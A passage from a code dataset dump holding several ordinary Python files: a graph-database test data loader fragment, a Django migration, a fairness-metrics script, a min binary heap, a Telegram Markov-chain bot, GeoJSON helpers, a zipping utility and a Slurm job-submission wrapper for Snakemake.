\"2008\":(2018, 0);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_teacher(start_year, end_year) VALUES \\\n \"2002\" -> \"1004\":(2018, 2019), \\\n \"2002\" -> \"1005\":(2018, 2019), \\\n \"2002\" -> \"1006\":(2018, 2019), \\\n \"2002\" -> \"1007\":(2018, 2019), \\\n \"2002\" -> \"1009\":(2017, 2018), \\\n \"2002\" -> \"1012\":(2015, 2016), \\\n \"2002\" -> \"1013\":(2015, 2016), \\\n \"2002\" -> \"1014\":(2015, 2016), \\\n \"2002\" -> \"1019\":(2014, 2015), \\\n \"2010\" -> \"1016\":(2018,2019), \\\n \"2006\" -> \"1008\":(2017, 2018);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n def drop_data(self):\n resp = self.client.execute('DROP SPACE nba; DROP SPACE student_space;')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n self.client.sign_out()\n self.client_pool.close()\n","sub_path":"tests/common/global_data_loader.py","file_name":"global_data_loader.py","file_ext":"py","file_size_in_byte":10884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324202798","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('BlogApp', '0008_auto_20150708_1514'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='slug_name',\n field=models.SlugField(default=datetime.datetime(2015, 7, 10, 7, 15, 17, 950542, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='comment',\n name='comment_text',\n field=models.TextField(max_length=200),\n ),\n ]\n","sub_path":"BlogProject/BlogApp/migrations/0009_auto_20150710_1015.py","file_name":"0009_auto_20150710_1015.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400853639","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom utils_Copy import *\n\n\n# In[2]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nimport numpy as np\n\n\n# In[3]:\n\n\n#PATH=\"/content/drive/My Drive/Kandidat speciale/500 - Notebooks/models/all races_CV50/\"\n\n\n#### AIR ### \n\nAIR=True\nfile_name=\"Fall_count_clusterOHE_std.csv\"\nfull_file_path=\"/restricted/s164512/G2020-57-Aalborg-bias/data_air/\"+file_name\n\n\n#titel_mitigation=\"TestCorrect9juni_strat\"\n#titel_mitigation=\"test25may200ep\"\n#save_to_folder=\"test\"\n\n\n\n#titel_mitigation=\"original\"\n#titel_mitigation=\"DroppingD\"\n#titel_mitigation=\"Gender Swap\"\n#titel_mitigation=\"DI remove\"\n#titel_mitigation=\"LFR\"\ntitel_mitigation=\"DI remove no gender\"\nPATH_orig=\"/restricted/s164512/G2020-57-Aalborg-bias/lau/FFNN_ohe/models/\"+titel_mitigation+\"/\"\n\n\n\n#save_to_folder=\"original\"\n#save_to_folder=\"Dropping D\"\n#save_to_folder=\"Gender Swap\"\n#save_to_folder=\"DI remove\"\n#save_to_folder=\"LFR\"\nsave_to_folder=\"DI remove no gender\"\n\n\ny_col_name=\"Fall\"\nX_col_names=['Gender',\n'BirthYear',\n'LoanPeriod',\n'NumberAts',\n'Ats_Polstring',\n'Ats_Mobilitystokke',\n'Ats_Belysning',\n'Ats_Underlag',\n'Ats_ToiletforhøjereStativ',\n'Ats_Signalgivere',\n'Ats_EldrevneKørestole',\n'Ats_Forstørrelsesglas',\n'Ats_Nødalarmsystemer',\n'Ats_MobilePersonløftere',\n'Ats_TrappelifteMedPlatforme',\n'Ats_Badekarsbrætter',\n'Ats_Albuestokke',\n'Ats_MaterialerOgRedskaberTilAfmærkning',\n'Ats_Ryglæn',\n#'Ats_0',\n'Ats_GanghjælpemidlerStøtteTilbehør',\n'Ats_Støttebøjler',\n'Ats_Lejringspuder',\n'Ats_Strømpepåtagere',\n'Ats_Dørtrin',\n'Ats_Spil',\n'Ats_BordePåStole',\n'Ats_Drejeskiver',\n'Ats_Toiletstole',\n'Ats_LøftereStationære',\n'Ats_Madmålingshjælpemidler',\n'Ats_Fodbeskyttelse',\n'Ats_Ståløftere',\n'Ats_Stole',\n'Ats_Sengeborde',\n'Ats_Toiletter',\n'Ats_ToiletforhøjereFaste',\n'Ats_Påklædning',\n'Ats_Brusere',\n'Ats_VævsskadeLiggende',\n'Ats_Døråbnere',\n'Ats_ServeringAfMad',\n'Ats_TrappelifteMedSæder',\n'Ats_SæderTilMotorkøretøjer',\n'Ats_KørestoleManuelleHjælper',\n'Ats_Gangbukke',\n'Ats_Rollatorer',\n'Ats_TryksårsforebyggendeSidde',\n'Ats_Fastnettelefoner',\n'Ats_Bækkener',\n'Ats_Vendehjælpemidler',\n'Ats_Sanseintegration',\n'Ats_Kørestolsbeskyttere',\n'Ats_Arbejdsstole',\n'Ats_Løftesejl',\n'Ats_KørestoleForbrændingsmotor',\n'Ats_Løftestropper',\n'Ats_Stiger',\n'Ats_TransportTrapper',\n'Ats_DrivaggregaterKørestole',\n'Ats_Emballageåbnere',\n'Ats_ToiletforhøjereLøse',\n'Ats_Hårvask',\n'Ats_PersonløftereStationære',\n'Ats_Madrasser',\n'Ats_Vinduesåbnere',\n'Ats_Læsestativer',\n'Ats_KørestoleManuelleDrivringe',\n'Ats_Sædepuder',\n'Ats_UdstyrCykler',\n'Ats_Karkludsvridere',\n'Ats_Vaskeklude',\n'Ats_Sengeudstyr',\n'Ats_Madlavningshjælpemidler',\n'Ats_Skohorn',\n'Ats_GribetængerManuelle',\n'Ats_Hvilestole',\n'Ats_EldrevneKørestoleStyring',\n'Ats_BærehjælpemidlerTilKørestole',\n'Ats_LøftegalgerSeng',\n'Ats_Høreforstærkere',\n'Ats_Kalendere',\n'Ats_Stokke',\n'Ats_Løftegalger',\n'Ats_Ure',\n'Ats_StøttegrebFlytbare',\n'Ats_Forflytningsplatforme',\n'Ats_RamperFaste',\n'Ats_Rygehjælpemidler',\n'Ats_Personvægte',\n'Ats_Manøvreringshjælpemidler',\n'Ats_Overtøj',\n'Ats_Lydoptagelse',\n'Ats_Gangborde',\n'Ats_Ståstøttestole',\n'Ats_RamperMobile',\n'Ats_Bærehjælpemidler',\n'Ats_Badekarssæder',\n'Ats_Siddemodulsystemer',\n'Ats_Videosystemer',\n'Ats_Siddepuder',\n'Ats_Sengeheste',\n'Ats_Stolerygge',\n'Ats_Rulleborde',\n'Ats_Sengeforlængere',\n'Ats_Madningsudstyr',\n'Ats_Brusestole',\n'Ats_Flerpunktsstokke',\n'Ats_SengebundeMedMotor',\n'Ats_Cykler',\n'Ats_CykelenhederKørestole',\n'Ats_Stokkeholdere',\n'Ats_Toiletarmstøtter',\n'Ats_Coxitstole',\n'Ats_Toiletsæder',\n'Ats_Rebstiger',\n'Ats_Forhøjerklodser',\n'Cluster_0',\n'Cluster_1',\n'Cluster_2',\n'Cluster_3',\n'Cluster_4',\n'Cluster_5',\n'Cluster_6',\n'Cluster_7',\n'Cluster_8',\n'Cluster_9',\n'Cluster_10',\n'Cluster_11',\n'Cluster_12',\n'Cluster_13',\n'Cluster_14',\n'Cluster_15',\n'Cluster_16',\n'Cluster_17',\n'Cluster_18',\n'Cluster_19']\n#X_col_names = [col for col in X_col_names if col not in leave_out ]\n\nprocted_col_name=\"Gender\"\n\noutput_col_name=\"output\"\n\noutput_prob_col_name=\"output_prob\"\n\n\n###### COMPASS ####\n\n#AIR=False\n\n#titel_mitigation=\"testCOMPASS\"\n#PATH_orig=\"/restricted/s164512/G2020-57-Aalborg-bias/lau/FFNN/models/\"+titel_mitigation+\"/\"\n\n#full_file_path = 'https://raw.githubusercontent.com/propublica/compas-analysis/master/compas-scores-two-years.csv'\n\n#y_col_name=\"is_recid\"\n#X_col_names=['remember_index','sex','age','race', 'juv_fel_count','juv_misd_count','juv_other_count','priors_count',\"c_charge_desc\",\"c_charge_degree\"]\n\n#procted_col_name=\"race\"\n\n\n# In[4]:\n\n\n#n_feat=len(X_col_names)\n#output_dim=1 #binary\n\n\n# In[ ]:\n\n\n\n\n\n# # Move testdata (obs-level) to correct folder (to plotting)\n\n# In[5]:\n\n\n#save_to_folder=\"original\"\n#save_to_folder=\"Dropping D\"\n\n\n# In[6]:\n\n\ntdata_move=pd.read_csv(PATH_orig+\"/all_test_data_localmodel.csv\")\ntdata_move.to_csv(f\"/restricted/s164512/G2020-57-Aalborg-bias/Plot_metrics/{save_to_folder}/FFNN_gender_obs.csv\")\n\n\n# # Collect confusion metrics for all 50 FFNN datamodels, and save to plotting\n\n# In[7]:\n\n\ndf2_copy=tdata_move.copy()\n\n\n# In[8]:\n\n\n\nmetrics_frame_gender=pd.DataFrame([],columns=[\"Gender\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"])\n\nfor modelnr in df2_copy[\"Model\"].unique():\n\n metrics_frame_sub_gender=get_df_w_metrics(df2_copy[df2_copy[\"Model\"]==modelnr],procted_col_name,y_col_name,output_col_name,output_prob_col_name).sort_values([\"Gender\"])[[\"Gender\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"]]#*100\n \n \n \n \n \n \n metrics_frame_gender= pd.concat([metrics_frame_gender,metrics_frame_sub_gender\n \n ],sort=False,axis=0)\n\n\n# In[9]:\n\n\nmetrics_frame_gender_to_plot=metrics_frame_gender.copy()\nmetrics_frame_gender_to_plot[\"Model\"]=\"FFNN\"\nmetrics_frame_gender_to_plot.to_csv(f\"/restricted/s164512/G2020-57-Aalborg-bias/Plot_metrics/{save_to_folder}/FFNN_gender.csv\")\n\n\n# In[10]:\n\n\nprint(\"This should be 100:\",metrics_frame_gender_to_plot.shape[0])\n\n\n# # GeCI intervals\n\n# In[11]:\n\n\nimport scipy.stats as st\n\nfor gender in metrics_frame_gender[\"Gender\"].unique():\n string_new2=str(gender)\n string_new=\" \"\n for col in [\"TPR\",\"FPR\",\"TNR\",\"FNR\"]:#,\"ACC\"]:\n string_new=string_new+\" & \"\n string_new2=string_new2+\" & \"\n \n \n data=metrics_frame_gender[(metrics_frame_gender[\"Gender\"]==gender)][col]\n m=np.mean(data)\n (slow,shigh) =st.t.interval(alpha=0.95, df=len(data)-1, loc=np.mean(data), scale=st.sem(data)) \n\n \n #print(f\"{col} for {gender} is: mean {round(m*100,2)} ({round(slow*100,2)},{round(shigh*100,2)})\")\n string_new2=string_new2+\"\\\\textbf{\"+f\"{round(m*100,1)}\"+ \"}\"\n string_new=string_new+f\"({round(slow*100,1)}-{round(shigh*100,1)})\" \n \n print(string_new2)\n print(string_new)\n \n\n\n# # Calculate total\n\n# In[12]:\n\n\ndf2_copy[\"Total\"]=\"Total\"\n\n\nmetrics_frame_all=pd.DataFrame([],columns=[\"Total\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"])\n\nfor modelnr in df2_copy[\"Model\"].unique():\n\n metrics_frame_sub_all=get_df_w_metrics(df2_copy[df2_copy[\"Model\"]==modelnr],\"Total\",y_col_name,output_col_name,output_prob_col_name).sort_values([\"Total\"])[[\"Total\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"]]#*100\n \n \n \n \n \n \n metrics_frame_all= pd.concat([metrics_frame_all,metrics_frame_sub_all\n \n ],sort=False,axis=0)\n\n\n# In[13]:\n\n\nmetrics_frame_all_to_plot=metrics_frame_all.copy()\nmetrics_frame_all_to_plot[\"Model\"]=\"FFNN\"\nmetrics_frame_all_to_plot.to_csv(f\"/restricted/s164512/G2020-57-Aalborg-bias/Plot_metrics/{save_to_folder}/FFNN_all.csv\")\n\n\n# In[14]:\n\n\nprint(\"This should be 50:\",metrics_frame_all_to_plot.shape[0])\n\n\n# # Print ACC\n\n# In[17]:\n\n\nimport scipy.stats as st\n\nfor gender in metrics_frame_all[\"Total\"].unique():\n string_new2=str(gender)\n string_new=\" \"\n for col in [\"ACC\"]:#[\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\"]:\n string_new=string_new+\" & \"\n string_new2=string_new2+\" & \"\n \n \n data=metrics_frame_all[(metrics_frame_all[\"Total\"]==gender)][col]\n m=np.mean(data)\n (slow,shigh) =st.t.interval(alpha=0.95, df=len(data)-1, loc=np.mean(data), scale=st.sem(data)) \n\n \n #print(f\"{col} for {gender} is: mean {round(m*100,2)} ({round(slow*100,2)},{round(shigh*100,2)})\")\n string_new2=string_new2+\"\\\\textbf{\"+f\"{round(m*100,1)}\"+ \"}\"\n string_new=string_new+f\"({round(slow*100,1)}-{round(shigh*100,1)})\" \n \n print(string_new2+\" \\\\\\ \")\n print(string_new+\" \\\\\\ \")\n \n\n\n# In[18]:\n\n\nimport scipy.stats as st\n\nfor gender in metrics_frame_gender[\"Gender\"].unique():\n string_new2=str(gender)\n string_new=\" \"\n for col in [\"ACC\"]:\n string_new=string_new+\" & \"\n string_new2=string_new2+\" & \"\n \n \n data=metrics_frame_gender[(metrics_frame_gender[\"Gender\"]==gender)][col]\n m=np.mean(data)\n (slow,shigh) =st.t.interval(alpha=0.95, df=len(data)-1, loc=np.mean(data), scale=st.sem(data)) \n\n \n #print(f\"{col} for {gender} is: mean {round(m*100,2)} ({round(slow*100,2)},{round(shigh*100,2)})\")\n string_new2=string_new2+\"\\\\textbf{\"+f\"{round(m*100,1)}\"+ \"}\"\n string_new=string_new+f\"({round(slow*100,1)}-{round(shigh*100,1)})\" \n \n print(string_new2+\" \\\\\\ \")\n print(string_new+\" \\\\\\ \")\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Legacy/Lau/FFNN_ohe/Get metrics ohe.py","file_name":"Get metrics ohe.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594716311","text":"import re\n\nclass SpecialCharacters :\n global regex\n regex = re.compile('[@_!#$%^&()<>/\\|}{~]')\n\n def checkSpecialCharacter(self, text):\n global regex\n if regex.search(text) != None:\n specialChar = regex.search(text).group(0)\n text = text.replace(specialChar, f'\\{specialChar}')\n return text\n","sub_path":"asebot/bot/components/special_characters.py","file_name":"special_characters.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55507082","text":"transformacion = None\nresultado = None\nsimbolo = None\nnumero_usuario = None\n\nwhile transformacion != (\"FARENHEIT\") and transformacion != (\"CELSIUS\"):\n transformacion = (input(\"Para: Celsius a Farenheit (Escribe: Celsius) Farenheit a Celsius (Escribe: Farenheit) -> \")).upper()\n\nnumero_usuario = float(input(\"Número({}) a transformar: \".format(transformacion)))\n\nif transformacion == (\"FARENHEIT\"):\n resultado = (numero_usuario - 32) / 1.8\nelif transformacion == (\"CELSIUS\"):\n resultado = numero_usuario * 1.8 + 32\n\nif transformacion == (\"FARENHEIT\"):\n simbolo = \"C\"\nelif transformacion == (\"CELSIUS\"):\n simbolo = \"F\"\n\nresultado = round(resultado,1)\n\nprint(\"Tu resultado es {}º{}\".format(resultado, simbolo))\n","sub_path":"transformador_grados.py","file_name":"transformador_grados.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563451661","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年3月18日\n@author: guanglin\n'''\na1=11\ndef mularg(a1,a2=999,*tup_arg,**dic_arg):\n print('a1=>',a1)\n print('a2=>',a2)\n for e in tup_arg:\n print(e)\n for k in list(dic_arg.keys()):\n print('%s-->%s' %(k,dic_arg[k]))\n \nmularg(1,888,123,456,y=0,z=2,x=9)\ndef odd():\n n=1\n while True:\n yield n\n n+=2\nodd_num = odd()\ncount = 0\nfor o in odd_num:\n if count >=5: break\n print(o)\n count +=1","sub_path":"src/base/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"484018379","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\ndef parent(i):\n return i // 2\n\ndef left(i):\n return 2 * i\n\ndef right(i):\n return 2 * i + 1\n\n\nclass MinBinaryHeap(object):\n \"\"\"Min Binary Heap implmentation of Priority Queue.\n\n Min-heap property: A[parent(i)] <= A[i].\n \"\"\"\n def __init__(self):\n self.A = [0]\n self.heap_size = 0\n\n def show(self):\n print(self.A)\n\n def find_min(self):\n return self.A[1]\n\n def min_heapify(self, i):\n \"\"\"Min heapify.\n\n Complexity: O(log(n)).\n \"\"\"\n l = left(i)\n r = right(i)\n if l <= self.heap_size and self.A[l] < self.A[i]:\n min_i = l\n else:\n min_i = i\n if r <= self.heap_size and self.A[r] < self.A[min_i]:\n min_i = r\n if min_i != i:\n # Swap node i and node min_i.\n self.A[i], self.A[min_i] = self.A[min_i], self.A[i]\n self.min_heapify(min_i)\n\n def build_min_heap(self, A):\n \"\"\"Build min heap from unordered array.\n\n Start from the level-1 nodes from leaves back to level-log(n) node.\n Specifically, node (n/2), node (n/2 - 1), ..., node 1, where\n n is the number of nodes including the root one.\n\n Complexity: O(n*log(n)) via simple analysis. Actually O(n).\n \"\"\"\n self.A.extend(A)\n self.heap_size = len(A)\n for i in reversed(range(1, (self.heap_size + 1) // 2 + 1)):\n self.min_heapify(i)\n\n def extract_min(self):\n if self.heap_size < 1:\n raise ValueError('Heap underflow.')\n minimum = self.A[1]\n last = self.A.pop()\n self.heap_size -= 1\n if self.heap_size < 1:\n # The last element is minimum.\n pass\n else:\n self.A[1] = last\n self.min_heapify(1)\n return minimum\n\n def decrease_key(self, i, key):\n if key > self.A[i]:\n raise ValueError('New key is larger than current key.')\n self.A[i] = key\n while i > 1 and self.A[parent(i)] > self.A[i]:\n # Swap node i and node parent(i).\n self.A[i], self.A[parent(i)] = self.A[parent(i)], self.A[i]\n i = parent(i)\n\n def insert(self, new_key):\n self.A.append(np.inf)\n self.heap_size += 1\n self.decrease_key(self.heap_size, new_key)\n\n\ndef main():\n print('Binary heap by inserting 3, 7, 5, 1:')\n min_pq = MinBinaryHeap()\n min_pq.insert(3)\n min_pq.insert(7)\n min_pq.insert(5)\n min_pq.insert(1)\n min_pq.show()\n\n print('Build min heap from unordered list [3, 7, 5, 1]:')\n min_pq = MinBinaryHeap()\n min_pq.build_min_heap([3, 7, 5, 1])\n min_pq.show()\n\n print('Decrease key 7 at position 4 to 2.')\n min_pq.decrease_key(4, 2)\n min_pq.show()\n\n print('Find min key:')\n print(min_pq.find_min())\n\n print('Extract min key:')\n _min = min_pq.extract_min()\n print('- Min: {}'.format(_min))\n print('- The remaining:')\n min_pq.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ds_min_binary_heap.py","file_name":"ds_min_binary_heap.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333663443","text":"import telebot\nimport markovify\nfrom decouple import config, Csv\nimport dataset\nfrom cachetools.func import ttl_cache\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nTELEGRAM_TOKEN = config('TELEGRAM_TOKEN', default='')\nADMIN_USERNAMES = config('ADMIN_USERNAMES', default='', cast=Csv())\nSENTENCE_COMMAND = config('SENTENCE_COMMAND', default='sentence')\nDATABASE_URL = config('DATABASE_URL', default='sqlite:///:memory:')\nMODEL_CACHE_TTL = config('MODEL_CACHE_TTL', default='300', cast=int)\nCOMMIT_HASH = config('HEROKU_SLUG_COMMIT', default='not set')\nMESSAGE_LIMIT = config('MESSAGE_LIMIT', default='5000', cast=int)\n\ndb = dataset.connect(DATABASE_URL)['messages']\nbot = telebot.TeleBot(TELEGRAM_TOKEN)\n\n\ndef is_from_admin(message):\n username = message.from_user.username\n chat_id = str(message.chat.id)\n username_admins = [\n u.user.username for u in bot.get_chat_administrators(chat_id)\n ]\n return (username in username_admins + ADMIN_USERNAMES)\n\n\n@ttl_cache(ttl=MODEL_CACHE_TTL)\ndef get_model(chat):\n logger.info(f'fetching messages for {chat.id}')\n chat_id = str(chat.id)\n chat_messages = db.find_one(chat_id=chat_id)\n if chat_messages:\n text = chat_messages['text']\n text_limited = '\\n'.join(text.splitlines()[-MESSAGE_LIMIT:])\n return markovify.text.NewlineText(text_limited)\n\n\n@bot.message_handler(commands=[SENTENCE_COMMAND])\ndef generate_sentence(message):\n chat_model = get_model(message.chat)\n generated_message = chat_model.make_sentence(\n max_overlap_ratio=0.7,\n tries=50\n ) if chat_model else None\n\n logger.info(f'generating message for {message.chat.id}')\n bot.send_message(\n message.chat.id,\n generated_message or 'i need more data'\n )\n\n\n@bot.message_handler(commands=['remove'])\ndef remove_messages(message):\n if is_from_admin(message):\n chat_id = str(message.chat.id)\n db.delete(chat_id=chat_id)\n get_model.cache_clear()\n bot.reply_to(message, 'messages deleted')\n logger.info(f'removing messages from {chat_id}')\n return\n\n bot.reply_to(message, 'u r not an admin 🤔')\n\n\n@bot.message_handler(commands=['version'])\ndef get_repo_version(message):\n hash_len = 7\n commit_hash = COMMIT_HASH[:hash_len]\n bot.reply_to(message, commit_hash)\n\n\n@bot.message_handler(commands=['flush'])\ndef flush_cache(message):\n if is_from_admin(message):\n get_model.cache_clear()\n bot.reply_to(message, 'cache cleared')\n logger.info('cache cleared')\n return\n bot.reply_to(message, 'u r not an admin 🤔')\n\n\n@bot.message_handler(func=lambda m: True)\ndef handle_message(message):\n update_model(message)\n if bot.get_me().username in message.text:\n generate_sentence(message)\n\n\ndef update_model(message):\n chat_id = str(message.chat.id)\n chat_messages = db.find_one(chat_id=chat_id) or {}\n db.upsert({\n 'chat_id': chat_id,\n 'text': '\\n'.join([chat_messages.get('text', ''), message.text])\n }, ['chat_id'])\n\n logger.info(f'saving message from {chat_id}')\n\n\nif __name__ == '__main__':\n logger.info(f'starting the bot')\n bot.polling(none_stop=True)\n","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612290055","text":"\r\ndef copyGeoJSON(oldGEOJSON):\r\n newGEOJSON = {}\r\n for attr in oldGEOJSON:\r\n if not attr == 'features':\r\n newGEOJSON[attr] = oldGEOJSON[attr]\r\n newGEOJSON[\"features\"] = []\r\n return newGEOJSON\r\n\r\ndef newGeoJSON():\r\n return {\"type\": \"FeatureCollection\", \"crs\": {\"type\": \"name\", \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"}},\"features\": []}\r\n\r\ndef newFeature(coords=[], properties={}, id=None, geometry='Point'):\r\n if geometry == 'Point':\r\n geo = {\"type\": \"Point\", \"coordinates\": coords}\r\n elif geometry == 'Polygon':\r\n geo = {\"type\": \"Polygon\", \"coordinates\": [coords]}\r\n elif geometry == 'MultiPolygon':\r\n geo = {\"type\": \"MultiPolygon\", \"coordinates\": coords}\r\n else:\r\n raise Exception(\"Not supported type: {}\".format(geometry))\r\n return {\"type\": \"Feature\", \"id\": id, \"properties\": properties, \"geometry\": geo}\r\n\r\ndef cround(coord, decimal=3):\r\n return [round(coord[0], decimal), round(coord[1], decimal)]\r\n","sub_path":"core/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130298130","text":"import os\nimport shutil\nimport re\n\nprog = re.compile(r\"^(?:.+?)\\.(?:jpg|png|jpeg|)$\")\ncwd = os.getcwd()\n\ntotal_num = 0\nwith os.scandir(cwd) as entries:\n for entry in entries:\n if (not entry.name.startswith(\".\")) and entry.is_dir():\n entry_num = 0\n for name in os.listdir(entry.path):\n m = prog.match(name)\n if m is not None:\n entry_num += 1\n total_num += entry_num\n print(f\"{entry.name} has {entry_num} files\")\n # print(f\"copy files in {str(entry.path)} to {cwd}\")\n shutil.copytree(entry.path, os.getcwd(), dirs_exist_ok=True)\n\nimport zipfile\nfrom pathlib import Path\n\ncwd_path = Path(cwd)\nzip_name = f\"石井坡街道-{cwd_path.name}-{total_num}条.zip\"\n\n# print(f\"{zip_name}\")\nnew_zip = zipfile.ZipFile(zip_name, \"w\")\nwith os.scandir(cwd) as entries:\n for entry in entries:\n if (not entry.name.startswith(\".\")) and entry.is_file():\n m = prog.match(entry.name)\n if m is not None:\n # print(f\"add {entry.name} to zip file\")\n new_zip.write(entry.name)\n os.remove(entry.path)\nnew_zip.close()\n\naws = input(\"Please press any key to continue!\")","sub_path":"extract_to_cwd_and_zip.py","file_name":"extract_to_cwd_and_zip.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"508410485","text":"#!/usr/bin/env python\n\"\"\"\nSubmit this clustering script for sbatch to snakemake with:\n\n snakemake -j 99 --debug --immediate-submit --cluster 'Snakefile_sbatch.py {dependencies}'\n\"\"\"\nimport argparse\nimport sys\nimport subprocess\nimport os\nimport math\nimport errno\nimport json\nfrom snakemake.utils import read_job_properties\n\ndef make_dir(directory):\n \"\"\"Make directory unless existing. Ignore error in the latter case.\"\"\"\n try:\n os.makedirs(directory)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\nclass SnakeJob:\n \"\"\"Snakemake can generate bash scripts that can be sumbitted by a\n scheduler. This class reads the bash script and stores the number of the\n rule, name of bash file and the supplied input files.\"\"\"\n def __init__(self, snakebashfile, dependencies=None, config=None):\n self.scriptname = snakebashfile\n job_properties = read_job_properties(snakebashfile)\n self.rule = job_properties['rule']\n self.ifiles = job_properties['input']\n self.ofiles = job_properties['output']\n self.params = job_properties['params']\n if dependencies == None or len(dependencies) < 1:\n self.dependencies = None\n else:\n # expects snakemake like list of numbers\n self.dependencies = dependencies\n assert len(self.dependencies) >= 1\n self.config = config\n\nclass UndefinedJobRule(Exception):\n \"\"\"Exception in case an sbatch job has no defined resource usage in the\n code.\"\"\"\n def __init__(self, msg):\n self.msg = msg\n\n\nclass SnakeJobSbatch(SnakeJob):\n def __init__(self, snakebashfile, dependencies=None, config=None):\n SnakeJob.__init__(self, snakebashfile, dependencies, config)\n if self.dependencies == None:\n self.dep_str = ''\n else:\n self.dep_str = '-d ' + ','.join([\"afterok:%s\" % d for d in self.dependencies])\n if os.path.isfile('config_file_size.json'):\n self.file_size_conf = json.load(open(\"config_file_size.json\"))\n\n def schedule(self):\n \"\"\"Schedules a snakemake job with sbatch and determines resource usage\n based on input files.\"\"\"\n if len(self.ofiles) > 0:\n # create the output directory, so slurm output can go there\n make_dir(os.path.dirname(os.path.abspath(self.ofiles[0])))\n\n schedule_rule = \"schedule_{0}\".format(self.rule)\n if schedule_rule in self.config:\n rule_conf = self.config[schedule_rule]\n # If rule_conf is referring to another scheduling rule, use those\n # resources instead\n try:\n if rule_conf.startswith(\"schedule_\"):\n rule_conf = self.config[rule_conf]\n except KeyError:\n raise UndefinedJobRule('No schedule config found for {0}'.format(rule_conf))\n except AttributeError:\n pass\n\n attributes = {\n 'dep_str': self.dep_str,\n 'job_name': 'snakemake_{0}'.format(self.rule),\n 'sbatch_job_path': self.config['sbatch_general']['wrapper_script'],\n 'script_name': self.scriptname,\n 'days': rule_conf['days'],\n 'hours': rule_conf['hours'],\n 'minutes': rule_conf['minutes'],\n 'partition': rule_conf['partition'],\n 'cores': rule_conf['cores'],\n 'account': self.config['sbatch_general']['account'],\n 'log_file': self.ofiles[0] + '-slurm.out' if len(self.ofiles) > 0 else 'snakemake-{0}-slurm.out'.format(self.rule),\n 'extra_parameters': rule_conf.get('extra_parameters', \"\")\n }\n if \"cores_per_filesize\" in rule_conf:\n file_type = rule_conf[\"cores_per_filesize\"][\"file\"]\n file_size = float(self.file_size_conf[self.params[\"sample_name\"]][file_type])\n cores_exponent = float(rule_conf[\"cores_per_filesize\"][\"exponent_of_Gb\"])\n cores_factor = rule_conf[\"cores_per_filesize\"][\"factor_per_Gb\"]\n attributes['cores'] = int(math.ceil((file_size**cores_exponent)*cores_factor))\n if attributes['cores'] > 16:\n attributes['cores'] = 16 # This is the hard limit on nr of cores on our cluster\n\n sbatch_cmd = \"\"\"sbatch --output={log_file} {dep_str} -A {account} -p {partition} -n {cores} -t {days}-{hours}:{minutes}:00 \\\n -J {job_name} {extra_parameters} {sbatch_job_path} \\\n '{script_name}'\"\"\".format(**attributes)\n else:\n raise UndefinedJobRule('No schedule config found for schedule_{0}'.format(self.rule))\n return 2\n\n print(sbatch_cmd, file=sys.stderr)\n popenrv = subprocess.Popen(sbatch_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True).communicate()\n\n # Snakemake expects only id of submitted job on stdout for scheduling\n # with {dependencies}\n try:\n print(\"%i\" % int(popenrv[0].split()[-1]))\n except ValueError:\n print(\"Not a submitted job: %s\" % popenrv[0])\n sys.exit(2)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__,\n 